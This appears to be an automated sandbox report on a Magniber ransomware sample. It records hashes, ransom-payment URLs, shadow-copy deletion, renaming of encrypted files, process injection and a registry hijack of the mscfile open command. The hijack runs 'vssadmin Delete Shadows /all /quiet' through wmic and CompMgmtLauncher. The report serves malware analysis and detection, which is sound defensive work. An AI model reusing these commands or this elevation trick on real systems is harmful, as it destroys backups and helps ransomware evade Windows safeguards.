Analysis
-
max time kernel
131s -
max time network
162s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
07-09-2021 15:59
Static task
static1
Behavioral task
behavioral1
Sample
3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe
Resource
win10v20210408
General
-
Target
3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe
-
Size
125KB
-
MD5
f9bf85cfb68d9e5f68bbccaf683af15c
-
SHA1
a2eae8c1350fcfa429d2af664d8320edbfabe5d3
-
SHA256
463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40
-
SHA512
07032679f19bba5690b59a6b689859d0b3611995cca6f990d2eee4b2f586493b29e70b4525e057abefe79a86695fa934f52e175a12098e0eeef7c1e3d049066a
Malware Config
Extracted
C:\Users\Admin\Desktop\readme.txt
magniber
http://5c90f04882607e909qwfekni.n5fnrf4l7bdjhelx.onion/qwfekni
http://5c90f04882607e909qwfekni.perages.cyou/qwfekni
http://5c90f04882607e909qwfekni.aimdrop.fit/qwfekni
http://5c90f04882607e909qwfekni.soblack.xyz/qwfekni
http://5c90f04882607e909qwfekni.sixsees.club/qwfekni
Signatures
-
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Process spawned unexpected child process 10 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1484 768 cmd.exe 50 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1000 768 cmd.exe 50 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1488 768 cmd.exe 50 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2024 768 cmd.exe 50 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1528 768 cmd.exe 50 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2652 768 vssadmin.exe 50 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2676 768 vssadmin.exe 50 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2668 768 vssadmin.exe 50 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2660 768 vssadmin.exe 50 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2748 768 vssadmin.exe 50 -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 7 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\OpenAdd.raw => C:\Users\Admin\Pictures\OpenAdd.raw.qwfekni taskhost.exe File renamed C:\Users\Admin\Pictures\ClearAssert.tif => C:\Users\Admin\Pictures\ClearAssert.tif.qwfekni taskhost.exe File renamed C:\Users\Admin\Pictures\ConnectUnprotect.tif => C:\Users\Admin\Pictures\ConnectUnprotect.tif.qwfekni taskhost.exe File opened for modification C:\Users\Admin\Pictures\ConvertUninstall.tiff taskhost.exe File renamed C:\Users\Admin\Pictures\ConvertUninstall.tiff => C:\Users\Admin\Pictures\ConvertUninstall.tiff.qwfekni taskhost.exe File renamed C:\Users\Admin\Pictures\RenameSearch.png => C:\Users\Admin\Pictures\RenameSearch.png.qwfekni taskhost.exe File renamed C:\Users\Admin\Pictures\CheckpointRestart.crw => C:\Users\Admin\Pictures\CheckpointRestart.crw.qwfekni taskhost.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 1948 set thread context of 1116 1948 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe 15 PID 1948 set thread context of 1168 1948 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe 14 PID 1948 set thread context of 1200 1948 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe 13 PID 1948 set thread context of 0 1948 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2660 vssadmin.exe 2748 vssadmin.exe 2652 vssadmin.exe 2676 vssadmin.exe 2668 vssadmin.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000002000000030000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{FD6F4151-1005-11EC-9C72-EA91F6580701} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d08c9bdb12a4d701 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "337802822" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000083c0d348ed9b2447b31074be776bc2bc000000000200000000001066000000010000200000002a258733372fa8429910bd4a6ef805a834ecd151fc4268333c5acc2c9f5338d0000000000e8000000002000020000000208c4f9b5ce74b2337e88457c76aac7011b62b3238ef59620eadfa3b1dad6d9620000000efd09d7401a17749f874f3e40f0dc6c804ea78b2869488c813146417666a6d3340000000841f256aa12fdec85ee468d3ed53664baee253218ea479f811da637383892392d81664e26ed99c31eab540dd86c67a6aa31a4f96b9000f9d802afc0513e633f3 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000083c0d348ed9b2447b31074be776bc2bc00000000020000000000106600000001000020000000b17a41ee34b0ae877ac9eddf96c507e3fc79e96aad020819d92c42f515c06255000000000e80000000020000200000007e9f0691ca4cd12583353220c706ed5241ec6b3bd7a91b0f3ea19a24021bf7e090000000d71bd9a600612ac3a1b0f5a687c8c7f613f704655dda5c58f35730e65ae246911364e89c6c06a3fe43f52aa15c4176bc7e550eac59fd3e738b37daf025c60ec3b1108f593283c00c8a01648830e99cd5173680a1d7efecdd941db4e8759c522e44be3a03c8ae146a18d5d550c650f9da4d66f9a980eb573ae31b27e56bcc36bc43533e53b2d45e5e1b034152caff923240000000f5a95c92660a95b059865a5a5e273ca1770b8904ca4876df40ce9490ee8b3f8b8ce49bf16fd253a70f6ad1b986d0801b546e6a9d30baf307ccce278a4207b4c2 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe -
Modifies registry class 16 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile taskhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Dwm.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command Dwm.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\MuiCache rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Explorer.EXE -
Opens file in notepad (likely ransom note) 2 IoCs
pid Process 1392 notepad.exe 412 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1948 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe 1948 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe 1804 iexplore.exe 1804 iexplore.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1200 Explorer.EXE -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 1948 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe 1948 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe 1948 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe 1948 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1200 Explorer.EXE Token: SeShutdownPrivilege 1200 Explorer.EXE Token: SeIncreaseQuotaPrivilege 1808 WMIC.exe Token: SeSecurityPrivilege 1808 WMIC.exe Token: SeTakeOwnershipPrivilege 1808 WMIC.exe Token: SeLoadDriverPrivilege 1808 WMIC.exe Token: SeSystemProfilePrivilege 1808 WMIC.exe Token: SeSystemtimePrivilege 1808 WMIC.exe Token: SeIncreaseQuotaPrivilege 1640 WMIC.exe Token: SeProfSingleProcessPrivilege 1808 WMIC.exe Token: SeSecurityPrivilege 1640 WMIC.exe Token: SeIncBasePriorityPrivilege 1808 WMIC.exe Token: SeTakeOwnershipPrivilege 1640 WMIC.exe Token: SeCreatePagefilePrivilege 1808 WMIC.exe Token: SeLoadDriverPrivilege 1640 WMIC.exe Token: SeBackupPrivilege 1808 WMIC.exe Token: SeSystemProfilePrivilege 1640 WMIC.exe Token: SeRestorePrivilege 1808 WMIC.exe Token: SeSystemtimePrivilege 1640 WMIC.exe Token: SeShutdownPrivilege 1808 WMIC.exe Token: SeProfSingleProcessPrivilege 1640 WMIC.exe Token: SeDebugPrivilege 1808 WMIC.exe Token: SeIncBasePriorityPrivilege 1640 WMIC.exe Token: SeSystemEnvironmentPrivilege 1808 WMIC.exe Token: SeCreatePagefilePrivilege 1640 WMIC.exe Token: SeRemoteShutdownPrivilege 1808 WMIC.exe Token: SeUndockPrivilege 1808 WMIC.exe Token: SeBackupPrivilege 1640 WMIC.exe Token: SeManageVolumePrivilege 1808 WMIC.exe Token: SeRestorePrivilege 1640 WMIC.exe Token: 33 1808 WMIC.exe Token: SeShutdownPrivilege 1640 WMIC.exe Token: 34 1808 WMIC.exe Token: SeDebugPrivilege 1640 WMIC.exe Token: 35 1808 WMIC.exe Token: SeSystemEnvironmentPrivilege 1640 WMIC.exe Token: SeRemoteShutdownPrivilege 1640 WMIC.exe Token: SeUndockPrivilege 1640 WMIC.exe Token: SeManageVolumePrivilege 1640 WMIC.exe Token: 33 1640 WMIC.exe Token: 34 1640 WMIC.exe Token: 35 1640 WMIC.exe Token: SeShutdownPrivilege 1200 Explorer.EXE Token: SeShutdownPrivilege 1200 Explorer.EXE Token: SeShutdownPrivilege 1200 Explorer.EXE Token: SeIncreaseQuotaPrivilege 864 WMIC.exe Token: SeSecurityPrivilege 864 WMIC.exe Token: SeTakeOwnershipPrivilege 864 WMIC.exe Token: SeLoadDriverPrivilege 864 WMIC.exe Token: SeSystemProfilePrivilege 864 WMIC.exe Token: SeSystemtimePrivilege 864 WMIC.exe Token: SeProfSingleProcessPrivilege 864 WMIC.exe Token: SeIncBasePriorityPrivilege 864 WMIC.exe Token: SeCreatePagefilePrivilege 864 WMIC.exe Token: SeBackupPrivilege 864 WMIC.exe Token: SeRestorePrivilege 864 WMIC.exe Token: SeShutdownPrivilege 864 WMIC.exe Token: SeDebugPrivilege 864 WMIC.exe Token: SeSystemEnvironmentPrivilege 864 WMIC.exe Token: SeRemoteShutdownPrivilege 864 WMIC.exe Token: SeUndockPrivilege 864 WMIC.exe Token: SeManageVolumePrivilege 864 WMIC.exe Token: 33 864 WMIC.exe Token: 34 864 WMIC.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 1200 Explorer.EXE 1200 Explorer.EXE 1804 iexplore.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE 1200 Explorer.EXE -
Suspicious use of SetWindowsHookEx 17 IoCs
pid Process 1804 iexplore.exe 1804 iexplore.exe 2124 IEXPLORE.EXE 2124 IEXPLORE.EXE 2124 IEXPLORE.EXE 2124 IEXPLORE.EXE 1200 Explorer.EXE 2000 IEXPLORE.EXE 2000 IEXPLORE.EXE 1804 iexplore.exe 2000 IEXPLORE.EXE 2000 IEXPLORE.EXE 2124 IEXPLORE.EXE 2124 IEXPLORE.EXE 1804 iexplore.exe 1804 iexplore.exe 1200 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1116 wrote to memory of 1392 1116 taskhost.exe 29 PID 1116 wrote to memory of 1392 1116 taskhost.exe 29 PID 1116 wrote to memory of 1392 1116 taskhost.exe 29 PID 1116 wrote to memory of 1528 1116 taskhost.exe 30 PID 1116 wrote to memory of 1528 1116 taskhost.exe 30 PID 1116 wrote to memory of 1528 1116 taskhost.exe 30 PID 1168 wrote to memory of 1256 1168 Dwm.exe 33 PID 1168 wrote to memory of 1256 1168 Dwm.exe 33 PID 1168 wrote to memory of 1256 1168 Dwm.exe 33 PID 1116 wrote to memory of 788 1116 taskhost.exe 32 PID 1116 wrote to memory of 788 1116 taskhost.exe 32 PID 1116 wrote to memory of 788 1116 taskhost.exe 32 PID 1200 wrote to memory of 1160 1200 Explorer.EXE 37 PID 1200 wrote to memory of 1160 1200 Explorer.EXE 37 PID 1200 wrote to memory of 1160 1200 Explorer.EXE 37 PID 788 wrote to memory of 1808 788 cmd.exe 40 PID 788 wrote to memory of 1808 788 cmd.exe 40 PID 788 wrote to memory of 1808 788 cmd.exe 40 PID 1256 wrote to memory of 1640 1256 cmd.exe 38 PID 1256 wrote to memory of 1640 1256 cmd.exe 38 PID 1256 wrote to memory of 1640 1256 cmd.exe 38 PID 1160 wrote to memory of 864 1160 cmd.exe 41 PID 1160 wrote to memory of 864 1160 cmd.exe 41 PID 1160 wrote to memory of 864 1160 cmd.exe 41 PID 1948 wrote to memory of 1084 1948 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe 42 PID 1948 wrote to memory of 1084 1948 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe 42 PID 1948 wrote to memory of 1084 1948 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe 42 PID 1528 wrote to memory of 1804 1528 cmd.exe 44 PID 1528 wrote to memory of 1804 1528 cmd.exe 44 PID 1528 wrote to memory of 1804 1528 cmd.exe 44 PID 1084 wrote to memory of 992 1084 cmd.exe 45 PID 1084 wrote to memory of 992 1084 cmd.exe 45 PID 1084 wrote to memory of 992 1084 cmd.exe 45 PID 1948 wrote to memory of 1628 1948 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe 46 PID 1948 wrote to memory of 1628 1948 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe 46 PID 1948 wrote to memory of 1628 1948 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe 46 PID 1628 wrote to memory of 1152 1628 cmd.exe 48 PID 1628 wrote to memory of 1152 1628 cmd.exe 48 PID 1628 wrote to memory of 1152 1628 cmd.exe 48 PID 2024 wrote to memory of 2092 2024 cmd.exe 61 PID 2024 wrote to memory of 2092 2024 cmd.exe 61 PID 2024 wrote to memory of 2092 2024 cmd.exe 61 PID 1804 wrote to memory of 2124 1804 iexplore.exe 62 PID 1804 wrote to memory of 2124 1804 iexplore.exe 62 PID 1804 wrote to memory of 2124 1804 iexplore.exe 62 PID 1804 wrote to memory of 2124 1804 iexplore.exe 62 PID 1000 wrote to memory of 2136 1000 cmd.exe 63 PID 1000 wrote to memory of 2136 1000 cmd.exe 63 PID 1000 wrote to memory of 2136 1000 cmd.exe 63 PID 1488 wrote to memory of 2148 1488 cmd.exe 64 PID 1488 wrote to memory of 2148 1488 cmd.exe 64 PID 1488 wrote to memory of 2148 1488 cmd.exe 64 PID 1528 wrote to memory of 2160 1528 cmd.exe 65 PID 1528 wrote to memory of 2160 1528 cmd.exe 65 PID 1528 wrote to memory of 2160 1528 cmd.exe 65 PID 1484 wrote to memory of 2188 1484 cmd.exe 66 PID 1484 wrote to memory of 2188 1484 cmd.exe 66 PID 1484 wrote to memory of 2188 1484 cmd.exe 66 PID 2188 wrote to memory of 2360 2188 CompMgmtLauncher.exe 67 PID 2188 wrote to memory of 2360 2188 CompMgmtLauncher.exe 67 PID 2188 wrote to memory of 2360 2188 CompMgmtLauncher.exe 67 PID 2148 wrote to memory of 2368 2148 CompMgmtLauncher.exe 68 PID 2148 wrote to memory of 2368 2148 CompMgmtLauncher.exe 68 PID 2148 wrote to memory of 2368 2148 CompMgmtLauncher.exe 68
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1200 -
C:\Users\Admin\AppData\Local\Temp\3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe"C:\Users\Admin\AppData\Local\Temp\3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe"2⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"4⤵PID:992
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"4⤵PID:1152
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1160 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:864
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Desktop\GrantSelect.mpeg32⤵
- Modifies registry class
PID:820
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\readme.txt2⤵
- Opens file in notepad (likely ransom note)
PID:412
-
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1168 -
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1256 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1640
-
-
